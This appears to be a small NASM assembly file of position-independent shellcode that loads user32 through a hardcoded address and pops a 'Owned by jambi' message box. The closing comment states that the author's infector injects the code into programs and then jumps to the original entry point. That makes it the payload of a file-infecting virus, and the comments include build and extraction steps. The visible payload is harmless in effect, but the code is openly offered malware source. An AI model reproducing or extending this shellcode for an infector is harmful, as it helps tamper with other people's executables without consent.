;msgBox.asm 
;nasm -f elf msgBox.asm
;ld -o msgbox msgBox.o
;objdump -d msgBox

[BITS 32]

LoadWs2_32:
    call GetLibHandle
    db 'user32',0
GetLibHandle:
    mov ebx,0x75832884
    call ebx
    jmp short getString
CallMessageBox:
    pop ecx
    push 0x00
    push ecx
    push ecx
    push 0x00
    mov ebx,0x7566ea71
    call ebx
    jmp short EndShellCode
getString:
    call CallMessageBox
    db 'Owned by jambi',0
EndShellCode:
    ; Here my infector inject a jmp opCode pointing on original entry point of infected program